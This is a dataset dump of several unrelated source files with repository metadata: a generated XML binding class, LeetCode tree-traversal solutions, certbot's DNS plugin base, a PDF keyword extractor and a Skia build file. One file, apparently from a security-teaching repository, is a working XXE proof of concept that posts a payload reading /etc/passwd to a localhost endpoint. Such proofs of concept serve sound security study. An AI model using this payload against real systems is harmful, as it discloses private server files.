                outfile.write(self.value)
        elif self.category == MixedContainer.CategorySimple:
            self.exportSimple(outfile, level, name)
        else:    # category == MixedContainer.CategoryComplex
            self.value.export(outfile, level, namespace,name)
    def exportSimple(self, outfile, level, name):
        # Pick the printf conversion matching the declared content type;
        # text/none content types write nothing here.
        if self.content_type == MixedContainer.TypeString:
            outfile.write('<%s>%s</%s>' % (self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeInteger or \
                self.content_type == MixedContainer.TypeBoolean:
            outfile.write('<%s>%d</%s>' % (self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeFloat or \
                self.content_type == MixedContainer.TypeDecimal:
            outfile.write('<%s>%f</%s>' % (self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeDouble:
            outfile.write('<%s>%g</%s>' % (self.name, self.value, self.name))
    def exportLiteral(self, outfile, level, name):
        # Emit a model_.MixedContainer(...) Python literal for this item.
        if self.category == MixedContainer.CategoryText:
            showIndent(outfile, level)
            outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' % \
                (self.category, self.content_type, self.name, self.value))
        elif self.category == MixedContainer.CategorySimple:
            showIndent(outfile, level)
            outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' % \
                (self.category, self.content_type, self.name, self.value))
        else:    # category == MixedContainer.CategoryComplex
            showIndent(outfile, level)
            outfile.write('model_.MixedContainer(%d, %d, "%s",\n' % \
                (self.category, self.content_type, self.name,))
            self.value.exportLiteral(outfile, level + 1)
            showIndent(outfile, level)
            outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class WindowsMailslotObjectType(common.DefinedObjectType):
"""The WindowsMailslotObjectType is intended to characterize Windows
mailslot objects."""
subclass = None
superclass = common.DefinedObjectType
def __init__(self, Handle=None, Max_Message_Size=None, Name=None, Read_Timeout=None, Security_Attributes=None):
super(WindowsMailslotObjectType, self).__init__(None)
self.Handle = Handle
self.Max_Message_Size = Max_Message_Size
self.Name = Name
self.Read_Timeout = Read_Timeout
self.Security_Attributes = Security_Attributes
def factory(*args_, **kwargs_):
if WindowsMailslotObjectType.subclass:
return WindowsMailslotObjectType.subclass(*args_, **kwargs_)
else:
return WindowsMailslotObjectType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Handle(self): return self.Handle
def set_Handle(self, Handle): self.Handle = Handle
def get_Max_Message_Size(self): return self.Max_Message_Size
def set_Max_Message_Size(self, Max_Message_Size): self.Max_Message_Size = Max_Message_Size
def get_Name(self): return self.Name
def set_Name(self, Name): self.Name = Name
def get_Read_Timeout(self): return self.Read_Timeout
def set_Read_Timeout(self, Read_Timeout): self.Read_Timeout = Read_Timeout
def get_Security_Attributes(self): return self.Security_Attributes
def set_Security_Attributes(self, Security_Attributes): self.Security_Attributes = Security_Attributes
def export(self, outfile, level, namespace_='WinMailslotObj:', name_='WindowsMailslotObjectType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='WindowsMailslotObjectType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='WinMailslotObj:', name_='WindowsMailslotObjectType'):
super(WindowsMailslotObjectType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='WindowsMailslotObjectType')
def exportChildren(self, outfile, level, namespace_='WinMailslotObj:', name_='WindowsMailslotObjectType', fromsubclass_=False):
if self.Handle is not None:
self.Handle.export(outfile, level, 'WinMailslotObj:', name_='Handle')
if self.Max_Message_Size is not None:
self.Max_Message_Size.export(outfile, level, 'WinMailslotObj:', name_='Max_Message_Size')
if self.Name is not None:
self.Name.export(outfile, level, 'WinMailslotObj:', name_='Name')
if self.Read_Timeout is not None:
self.Read_Timeout.export(outfile, level, 'WinMailslotObj:', name_='Read_Timeout')
if self.Security_Attributes is not None:
self.Security_Attributes.export(outfile, level, 'WinMailslotObj:', name_='Security_Attributes')
def hasContent_(self):
if (
self.Handle is not None or
self.Max_Message_Size is not None or
self.Name is not None or
self.Read_Timeout is not None or
self.Security_Attributes is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='WindowsMailslotObjectType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.Handle is not None:
showIndent(outfile, level)
outfile.write('Handle=%s,\n' % quote_python(self.Handle).encode(ExternalEncoding))
if self.Max_Message_Size is not None:
showIndent(outfile, level)
outfile.write('Max_Message_Size=%s,\n' % quote_python(self.Max_Message_Size).encode(ExternalEncoding))
if self.Name is not None:
showIndent(outfile, level)
outfile.write('Name=%s,\n' % quote_python(self.Name).encode(ExternalEncoding))
if self.Read_Timeout is not None:
showIndent(outfile, level)
outfile.write('Read_Timeout=%s,\n' % quote_python(self.Read_Timeout).encode(ExternalEncoding))
if self.Security_Attributes is not None:
showIndent(outfile, level)
outfile.write('Security_Attributes=%s,\n' % quote_python(self.Security_Attributes).encode(ExternalEncoding))
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Handle':
Handle_ = child_.text
Handle_ = self.gds_validate_string(Handle_, node, 'Handle')
self.Handle = Handle_
elif nodeName_ == 'Max_Message_Size':
Max_Message_Size_ = child_.text
Max_Message_Size_ = self.gds_validate_string(Max_Message_Size_, node, 'Max_Message_Size')
self.Max_Message_Size = Max_Message_Size_
elif nodeName_ == 'Name':
Name_ = child_.text
Name_ = self.gds_validate_string(Name_, node, 'Name')
self.Name = Name_
elif nodeName_ == 'Read_Timeout':
Read_Timeout_ = child_.text
Read_Timeout_ = self.gds_validate_string(Read_Timeout_, node, 'Read_Timeout')
self.Read_Timeout = Read_Timeout_
elif nodeName_ == 'Security_Attributes':
Security_Attributes_ = child_.text
Security_Attributes_ = self.gds_validate_string(Security_Attributes_, node, 'Security_Attributes')
self.Security_Attributes = Security_Attributes_
super(WindowsMailslotObjectType, self).buildChildren(child_, node, nodeName_, True)
# end class WindowsMailslotObjectType
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Mailslot'
rootClass = WindowsMailslotObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(sys.stdout, 0, name_=rootTag,
namespacedef_='')
return rootObj
def parseString(inString):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Mailslot'
rootClass = WindowsMailslotObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(sys.stdout, 0, name_="Windows_Mailslot",
namespacedef_='')
return rootObj
def parseLiteral(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Mailslot'
rootClass = WindowsMailslotObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('#from Win_Mailslot_Object import *\n\n')
sys.stdout.write('import Win_Mailslot_Object as model_\n\n')
sys.stdout.write('rootObj = model_.rootTag(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"WindowsMailslotObjectType"
]
| false
| true
|
f71905580a519f932cc674741f730cc9139a87df
| 833
|
py
|
Python
|
Dataset/Leetcode/valid/102/204.py
|
kkcookies99/UAST
|
fff81885aa07901786141a71e5600a08d7cb4868
|
[
"MIT"
] | null | null | null |
Dataset/Leetcode/valid/102/204.py
|
kkcookies99/UAST
|
fff81885aa07901786141a71e5600a08d7cb4868
|
[
"MIT"
] | null | null | null |
Dataset/Leetcode/valid/102/204.py
|
kkcookies99/UAST
|
fff81885aa07901786141a71e5600a08d7cb4868
|
[
"MIT"
] | null | null | null |
class Solution:
    def XXX(self, root: TreeNode) -> List[List[int]]:
        """Breadth-first level-order traversal: return the tree's node
        values grouped by depth, top to bottom.

        Improvements over the original: uses a deque so dequeuing is O(1)
        (list.pop(0) made the whole traversal O(n^2)), and replaces the
        manual count1/count2 bookkeeping with a per-level snapshot of the
        queue length.
        """
        if not root:
            return []
        # Local import keeps the module's import surface unchanged.
        from collections import deque
        levels = []
        queue = deque([root])
        while queue:
            width = len(queue)  # number of nodes on the current level
            current = []
            for _ in range(width):
                node = queue.popleft()  # O(1), vs list.pop(0)'s O(n)
                current.append(node.val)
                if node.left:
                    queue.append(node.left)
                if node.right:
                    queue.append(node.right)
            levels.append(current)
        return levels
| 33.32
| 124
| 0.521008
|
class Solution:
    def XXX(self, root: TreeNode) -> List[List[int]]:
        """Return the tree's node values grouped level by level (BFS)."""
        if not root:
            return []
        out = []
        frontier = [root]
        while frontier:
            level_vals = []
            next_frontier = []
            # Visit every node on the current level, collecting its value
            # and queuing its children for the next level.
            for node in frontier:
                level_vals.append(node.val)
                if node.left:
                    next_frontier.append(node.left)
                if node.right:
                    next_frontier.append(node.right)
            out.append(level_vals)
            frontier = next_frontier
        return out
| true
| true
|
f719056e15b29ef4606019d3603298ad5627461c
| 314
|
py
|
Python
|
exploits/xml_exploit.py
|
denny00786/CASoftwareDevelopment
|
d03c82b6bb033a39b4270115ec464eca773e0814
|
[
"Apache-2.0"
] | 1
|
2020-04-02T00:29:16.000Z
|
2020-04-02T00:29:16.000Z
|
exploits/xml_exploit.py
|
denny00786/CASoftwareDevelopment
|
d03c82b6bb033a39b4270115ec464eca773e0814
|
[
"Apache-2.0"
] | null | null | null |
exploits/xml_exploit.py
|
denny00786/CASoftwareDevelopment
|
d03c82b6bb033a39b4270115ec464eca773e0814
|
[
"Apache-2.0"
] | 4
|
2021-04-01T21:31:01.000Z
|
2022-03-23T08:22:44.000Z
|
import requests

# Target endpoint that parses client-supplied XML.
url = 'http://localhost/xml'
# XXE (XML External Entity) proof-of-concept payload: declares an external
# entity resolving to /etc/passwd and references it in the document body.
# A parser configured to resolve external entities will include the file's
# contents in its output.
shellcode = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
'''
# Submit the payload as the form field the endpoint reads.
data = {'input_data': shellcode}
response = requests.post(url, data=data)
# If the target is vulnerable, the leaked file appears in the response body.
print(response.text)
| 15.7
| 58
| 0.640127
|
import requests

# Endpoint under test (parses client-supplied XML).
url = 'http://localhost/xml'
# XXE proof-of-concept: external entity pointing at /etc/passwd,
# referenced from the document body.
shellcode = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
'''
data = {'input_data': shellcode}
response = requests.post(url, data=data)
# Response contains the leaked file when the parser resolves the entity.
print(response.text)
| true
| true
|
f71905d79157038348e3b499a02d4481fdbe417c
| 11,471
|
py
|
Python
|
certbot/plugins/dns_common.py
|
aaroncohen/certbot
|
c3434bac26592585d12feb781a87f3e2be846e42
|
[
"Apache-2.0"
] | 1
|
2018-09-12T03:07:11.000Z
|
2018-09-12T03:07:11.000Z
|
certbot/plugins/dns_common.py
|
978740431/certbot
|
c3434bac26592585d12feb781a87f3e2be846e42
|
[
"Apache-2.0"
] | null | null | null |
certbot/plugins/dns_common.py
|
978740431/certbot
|
c3434bac26592585d12feb781a87f3e2be846e42
|
[
"Apache-2.0"
] | null | null | null |
"""Common code for DNS Authenticator Plugins."""
import abc
import logging
import os
import stat
from time import sleep
import configobj
import zope.interface
from acme import challenges
from certbot import errors
from certbot import interfaces
from certbot.display import ops
from certbot.display import util as display_util
from certbot.plugins import common
logger = logging.getLogger(__name__)
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class DNSAuthenticator(common.Plugin):
"""Base class for DNS Authenticators"""
def __init__(self, config, name):
super(DNSAuthenticator, self).__init__(config, name)
self._attempt_cleanup = False
@classmethod
def add_parser_arguments(cls, add, default_propagation_seconds=10): # pylint: disable=arguments-differ
add('propagation-seconds',
default=default_propagation_seconds,
type=int,
help='The number of seconds to wait for DNS to propagate before asking the ACME server '
'to verify the DNS record.')
def get_chall_pref(self, unused_domain): # pylint: disable=missing-docstring,no-self-use
return [challenges.DNS01]
def prepare(self): # pylint: disable=missing-docstring
pass
    def perform(self, achalls):  # pylint: disable=missing-docstring
        # Create one DNS TXT record per dns-01 challenge, then wait for the
        # configured propagation window before returning the responses.
        self._setup_credentials()
        # Records may exist from here on, so cleanup() must attempt removal.
        self._attempt_cleanup = True
        responses = []
        for achall in achalls:
            domain = achall.domain
            validation_domain_name = achall.validation_domain_name(domain)
            validation = achall.validation(achall.account_key)
            self._perform(domain, validation_domain_name, validation)
            responses.append(achall.response(achall.account_key))
        # DNS updates take time to propagate and checking to see if the update has occurred is not
        # reliable (the machine this code is running on might be able to see an update before
        # the ACME server). So: we sleep for a short amount of time we believe to be long enough.
        logger.info("Waiting %d seconds for DNS changes to propagate",
                    self.conf('propagation-seconds'))
        sleep(self.conf('propagation-seconds'))
        return responses
    def cleanup(self, achalls):  # pylint: disable=missing-docstring
        # Remove the TXT records created by perform(); skipped entirely when
        # perform() never ran far enough to create any.
        if self._attempt_cleanup:
            for achall in achalls:
                domain = achall.domain
                validation_domain_name = achall.validation_domain_name(domain)
                validation = achall.validation(achall.account_key)
                self._cleanup(domain, validation_domain_name, validation)
@abc.abstractmethod
def _setup_credentials(self): # pragma: no cover
"""
Establish credentials, prompting if necessary.
"""
raise NotImplementedError()
@abc.abstractmethod
def _perform(self, domain, validation_domain_name, validation): # pragma: no cover
"""
Performs a dns-01 challenge by creating a DNS TXT record.
:param str domain: The domain being validated.
:param str validation_domain_name: The validation record domain name.
:param str validation: The validation record content.
:raises errors.PluginError: If the challenge cannot be performed
"""
raise NotImplementedError()
@abc.abstractmethod
def _cleanup(self, domain, validation_domain_name, validation): # pragma: no cover
"""
Deletes the DNS TXT record which would have been created by `_perform_achall`.
Fails gracefully if no such record exists.
:param str domain: The domain being validated.
:param str validation_domain_name: The validation record domain name.
:param str validation: The validation record content.
"""
raise NotImplementedError()
def _configure(self, key, label):
"""
Ensure that a configuration value is available.
If necessary, prompts the user and stores the result.
:param str key: The configuration key.
:param str label: The user-friendly label for this piece of information.
"""
configured_value = self.conf(key)
if not configured_value:
new_value = self._prompt_for_data(label)
setattr(self.config, self.dest(key), new_value)
def _configure_file(self, key, label, validator=None):
"""
Ensure that a configuration value is available for a path.
If necessary, prompts the user and stores the result.
:param str key: The configuration key.
:param str label: The user-friendly label for this piece of information.
"""
configured_value = self.conf(key)
if not configured_value:
new_value = self._prompt_for_file(label, validator)
setattr(self.config, self.dest(key), os.path.abspath(os.path.expanduser(new_value)))
def _configure_credentials(self, key, label, required_variables=None):
"""
As `_configure_file`, but for a credential configuration file.
If necessary, prompts the user and stores the result.
Always stores absolute paths to avoid issues during renewal.
:param str key: The configuration key.
:param str label: The user-friendly label for this piece of information.
:param dict required_variables: Map of variable which must be present to error to display.
"""
def __validator(filename):
if required_variables:
CredentialsConfiguration(filename, self.dest).require(required_variables)
self._configure_file(key, label, __validator)
credentials_configuration = CredentialsConfiguration(self.conf(key), self.dest)
if required_variables:
credentials_configuration.require(required_variables)
return credentials_configuration
@staticmethod
def _prompt_for_data(label):
"""
Prompt the user for a piece of information.
:param str label: The user-friendly label for this piece of information.
:returns: The user's response (guaranteed non-empty).
:rtype: str
"""
def __validator(i):
if not i:
raise errors.PluginError('Please enter your {0}.'.format(label))
code, response = ops.validated_input(
__validator,
'Input your {0}'.format(label),
force_interactive=True)
if code == display_util.OK:
return response
else:
raise errors.PluginError('{0} required to proceed.'.format(label))
@staticmethod
def _prompt_for_file(label, validator=None):
"""
Prompt the user for a path.
:param str label: The user-friendly label for the file.
:param callable validator: A method which will be called to validate the supplied input
after it has been validated to be a non-empty path to an existing file. Should throw a
`~certbot.errors.PluginError` to indicate any issue.
:returns: The user's response (guaranteed to exist).
:rtype: str
"""
def __validator(filename):
if not filename:
raise errors.PluginError('Please enter a valid path to your {0}.'.format(label))
filename = os.path.expanduser(filename)
validate_file(filename)
if validator:
validator(filename)
code, response = ops.validated_directory(
__validator,
'Input the path to your {0}'.format(label),
force_interactive=True)
if code == display_util.OK:
return response
else:
raise errors.PluginError('{0} required to proceed.'.format(label))
class CredentialsConfiguration(object):
"""Represents a user-supplied filed which stores API credentials."""
def __init__(self, filename, mapper=lambda x: x):
"""
:param str filename: A path to the configuration file.
:param callable mapper: A transformation to apply to configuration key names
:raises errors.PluginError: If the file does not exist or is not a valid format.
"""
validate_file_permissions(filename)
try:
self.confobj = configobj.ConfigObj(filename)
except configobj.ConfigObjError as e:
logger.debug("Error parsing credentials configuration: %s", e, exc_info=True)
raise errors.PluginError("Error parsing credentials configuration: {0}".format(e))
self.mapper = mapper
def require(self, required_variables):
"""Ensures that the supplied set of variables are all present in the file.
:param dict required_variables: Map of variable which must be present to error to display.
:raises errors.PluginError: If one or more are missing.
"""
messages = []
for var in required_variables:
if not self._has(var):
messages.append('Property "{0}" not found (should be {1}).'
.format(self.mapper(var), required_variables[var]))
elif not self._get(var):
messages.append('Property "{0}" not set (should be {1}).'
.format(self.mapper(var), required_variables[var]))
if messages:
raise errors.PluginError(
'Missing {0} in credentials configuration file {1}:\n * {2}'.format(
'property' if len(messages) == 1 else 'properties',
self.confobj.filename,
'\n * '.join(messages)
)
)
def conf(self, var):
"""Find a configuration value for variable `var`, as transformed by `mapper`.
:param str var: The variable to get.
:returns: The value of the variable.
:rtype: str
"""
return self._get(var)
def _has(self, var):
return self.mapper(var) in self.confobj
def _get(self, var):
return self.confobj.get(self.mapper(var))
def validate_file(filename):
"""Ensure that the specified file exists."""
if not os.path.exists(filename):
raise errors.PluginError('File not found: {0}'.format(filename))
if not os.path.isfile(filename):
raise errors.PluginError('Path is not a file: {0}'.format(filename))
def validate_file_permissions(filename):
"""Ensure that the specified file exists and warn about unsafe permissions."""
validate_file(filename)
permissions = stat.S_IMODE(os.stat(filename).st_mode)
if permissions & stat.S_IRWXO:
logger.warning('Unsafe permissions on credentials configuration file: %s', filename)
def base_domain_name_guesses(domain):
"""Return a list of progressively less-specific domain names.
One of these will probably be the domain name known to the DNS provider.
:Example:
>>> base_domain_name_guesses('foo.bar.baz.example.com')
['foo.bar.baz.example.com', 'bar.baz.example.com', 'baz.example.com', 'example.com', 'com']
:param str domain: The domain for which to return guesses.
:returns: The a list of less specific domain names.
:rtype: list
"""
fragments = domain.split('.')
return ['.'.join(fragments[i:]) for i in range(0, len(fragments))]
| 35.404321
| 107
| 0.648418
|
import abc
import logging
import os
import stat
from time import sleep
import configobj
import zope.interface
from acme import challenges
from certbot import errors
from certbot import interfaces
from certbot.display import ops
from certbot.display import util as display_util
from certbot.plugins import common
logger = logging.getLogger(__name__)
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class DNSAuthenticator(common.Plugin):
def __init__(self, config, name):
super(DNSAuthenticator, self).__init__(config, name)
self._attempt_cleanup = False
@classmethod
def add_parser_arguments(cls, add, default_propagation_seconds=10):
add('propagation-seconds',
default=default_propagation_seconds,
type=int,
help='The number of seconds to wait for DNS to propagate before asking the ACME server '
'to verify the DNS record.')
def get_chall_pref(self, unused_domain):
return [challenges.DNS01]
def prepare(self):
pass
def perform(self, achalls):
self._setup_credentials()
self._attempt_cleanup = True
responses = []
for achall in achalls:
domain = achall.domain
validation_domain_name = achall.validation_domain_name(domain)
validation = achall.validation(achall.account_key)
self._perform(domain, validation_domain_name, validation)
responses.append(achall.response(achall.account_key))
logger.info("Waiting %d seconds for DNS changes to propagate",
self.conf('propagation-seconds'))
sleep(self.conf('propagation-seconds'))
return responses
def cleanup(self, achalls):
if self._attempt_cleanup:
for achall in achalls:
domain = achall.domain
validation_domain_name = achall.validation_domain_name(domain)
validation = achall.validation(achall.account_key)
self._cleanup(domain, validation_domain_name, validation)
@abc.abstractmethod
def _setup_credentials(self):
raise NotImplementedError()
@abc.abstractmethod
def _perform(self, domain, validation_domain_name, validation):
raise NotImplementedError()
@abc.abstractmethod
def _cleanup(self, domain, validation_domain_name, validation):
raise NotImplementedError()
def _configure(self, key, label):
configured_value = self.conf(key)
if not configured_value:
new_value = self._prompt_for_data(label)
setattr(self.config, self.dest(key), new_value)
def _configure_file(self, key, label, validator=None):
configured_value = self.conf(key)
if not configured_value:
new_value = self._prompt_for_file(label, validator)
setattr(self.config, self.dest(key), os.path.abspath(os.path.expanduser(new_value)))
def _configure_credentials(self, key, label, required_variables=None):
def __validator(filename):
if required_variables:
CredentialsConfiguration(filename, self.dest).require(required_variables)
self._configure_file(key, label, __validator)
credentials_configuration = CredentialsConfiguration(self.conf(key), self.dest)
if required_variables:
credentials_configuration.require(required_variables)
return credentials_configuration
@staticmethod
def _prompt_for_data(label):
def __validator(i):
if not i:
raise errors.PluginError('Please enter your {0}.'.format(label))
code, response = ops.validated_input(
__validator,
'Input your {0}'.format(label),
force_interactive=True)
if code == display_util.OK:
return response
else:
raise errors.PluginError('{0} required to proceed.'.format(label))
@staticmethod
def _prompt_for_file(label, validator=None):
def __validator(filename):
if not filename:
raise errors.PluginError('Please enter a valid path to your {0}.'.format(label))
filename = os.path.expanduser(filename)
validate_file(filename)
if validator:
validator(filename)
code, response = ops.validated_directory(
__validator,
'Input the path to your {0}'.format(label),
force_interactive=True)
if code == display_util.OK:
return response
else:
raise errors.PluginError('{0} required to proceed.'.format(label))
class CredentialsConfiguration(object):
def __init__(self, filename, mapper=lambda x: x):
validate_file_permissions(filename)
try:
self.confobj = configobj.ConfigObj(filename)
except configobj.ConfigObjError as e:
logger.debug("Error parsing credentials configuration: %s", e, exc_info=True)
raise errors.PluginError("Error parsing credentials configuration: {0}".format(e))
self.mapper = mapper
def require(self, required_variables):
messages = []
for var in required_variables:
if not self._has(var):
messages.append('Property "{0}" not found (should be {1}).'
.format(self.mapper(var), required_variables[var]))
elif not self._get(var):
messages.append('Property "{0}" not set (should be {1}).'
.format(self.mapper(var), required_variables[var]))
if messages:
raise errors.PluginError(
'Missing {0} in credentials configuration file {1}:\n * {2}'.format(
'property' if len(messages) == 1 else 'properties',
self.confobj.filename,
'\n * '.join(messages)
)
)
def conf(self, var):
return self._get(var)
def _has(self, var):
return self.mapper(var) in self.confobj
def _get(self, var):
return self.confobj.get(self.mapper(var))
def validate_file(filename):
if not os.path.exists(filename):
raise errors.PluginError('File not found: {0}'.format(filename))
if not os.path.isfile(filename):
raise errors.PluginError('Path is not a file: {0}'.format(filename))
def validate_file_permissions(filename):
validate_file(filename)
permissions = stat.S_IMODE(os.stat(filename).st_mode)
if permissions & stat.S_IRWXO:
logger.warning('Unsafe permissions on credentials configuration file: %s', filename)
def base_domain_name_guesses(domain):
fragments = domain.split('.')
return ['.'.join(fragments[i:]) for i in range(0, len(fragments))]
| true
| true
|
f7190714a40b489705d1a2f0f757254156b06f7f
| 1,247
|
py
|
Python
|
crawler/pdf.py
|
mental689/paddict
|
493268b62531c698687d42416edf61c602250133
|
[
"MIT"
] | 1
|
2019-06-22T10:28:21.000Z
|
2019-06-22T10:28:21.000Z
|
crawler/pdf.py
|
mental689/paddict
|
493268b62531c698687d42416edf61c602250133
|
[
"MIT"
] | 4
|
2020-09-05T01:48:18.000Z
|
2022-03-02T04:29:25.000Z
|
crawler/pdf.py
|
mental689/paddict
|
493268b62531c698687d42416edf61c602250133
|
[
"MIT"
] | null | null | null |
#import PyPDF2 # PyPDF2 extracts texts from PDF markup. We found that it worked relatively poor with CVPR papers. Spaces between words are often omitted in the outputs.
import textract # textract uses external OCR command "tesseract" to extract texts. The workflow is to first convert pdf files to ppm images and then apply OCR to extract texts.
from nltk.tokenize import word_tokenize
import os, re
import django
django.setup()
from papers.settings import BASE_DIR
import xml.etree.ElementTree as ET
def get_stopwords():
with open("{}/static/stopwords.txt".format(BASE_DIR)) as f:
stopwords = [w.strip() for w in f.readlines()]
return stopwords
STOPWORDS = get_stopwords()
def extract_keywords_from_pdf(pdf_file):
text = str(textract.process(pdf_file, method='tesseract', language='eng', layout="layout"))
tokens = word_tokenize(text)
tokens =[tk.strip() for tk in tokens]
tokens =[tk.replace('-\\n','') for tk in tokens]
words = [w for w in tokens if w not in STOPWORDS]
words = [re.sub('[^0-9a-zA-Z]+','',w).lower() for w in words]
words = [w for w in words if len(w) > 2]
return words
def parse_cermine_output(cermine_file):
tree = ET.parse(cermine_file)
root = tree.getroot()
| 34.638889
| 176
| 0.715317
|
ee.ElementTree as ET
def get_stopwords():
with open("{}/static/stopwords.txt".format(BASE_DIR)) as f:
stopwords = [w.strip() for w in f.readlines()]
return stopwords
STOPWORDS = get_stopwords()
def extract_keywords_from_pdf(pdf_file):
text = str(textract.process(pdf_file, method='tesseract', language='eng', layout="layout"))
tokens = word_tokenize(text)
tokens =[tk.strip() for tk in tokens]
tokens =[tk.replace('-\\n','') for tk in tokens]
words = [w for w in tokens if w not in STOPWORDS]
words = [re.sub('[^0-9a-zA-Z]+','',w).lower() for w in words]
words = [w for w in words if len(w) > 2]
return words
def parse_cermine_output(cermine_file):
tree = ET.parse(cermine_file)
root = tree.getroot()
| true
| true
|
f71907581411d3f59e6caa7fc154349051e25a21
| 11,381
|
gyp
|
Python
|
skia/skia_library_opts.gyp
|
shaochangbin/chromium-crosswalk
|
634d34e4cf82b4f7400357c53ec12efaffe94add
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2019-01-16T03:57:28.000Z
|
2021-01-23T15:29:45.000Z
|
skia/skia_library_opts.gyp
|
shaochangbin/chromium-crosswalk
|
634d34e4cf82b4f7400357c53ec12efaffe94add
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
skia/skia_library_opts.gyp
|
shaochangbin/chromium-crosswalk
|
634d34e4cf82b4f7400357c53ec12efaffe94add
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1
|
2017-03-15T13:21:38.000Z
|
2017-03-15T13:21:38.000Z
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This gyp file contains the platform-specific optimizations for Skia
{
'targets': [
# Due to an unfortunate intersection of lameness between gcc and gyp,
# we have to build the *_SSE2.cpp files in a separate target. The
# gcc lameness is that, in order to compile SSE2 intrinsics code, it
# must be passed the -msse2 flag. However, with this flag, it may
# emit SSE2 instructions even for scalar code, such as the CPUID
# test used to test for the presence of SSE2. So that, and all other
# code must be compiled *without* -msse2. The gyp lameness is that it
# does not allow file-specific CFLAGS, so we must create this extra
# target for those files to be compiled with -msse2.
#
# This is actually only a problem on 32-bit Linux (all Intel Macs have
# SSE2, Linux x86_64 has SSE2 by definition, and MSC will happily emit
# SSE2 from instrinsics, which generating plain ol' 386 for everything
# else). However, to keep the .gyp file simple and avoid platform-specific
# build breakage, we do this on all platforms.
# For about the same reason, we need to compile the ARM opts files
# separately as well.
{
'target_name': 'skia_opts',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'conditions': [
[ 'os_posix == 1 and OS != "mac" and OS != "android" and \
target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'cflags': [
'-msse2',
],
}],
[ 'target_arch != "arm" and target_arch != "mipsel" and \
target_arch != "arm64"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRect_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkUtils_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
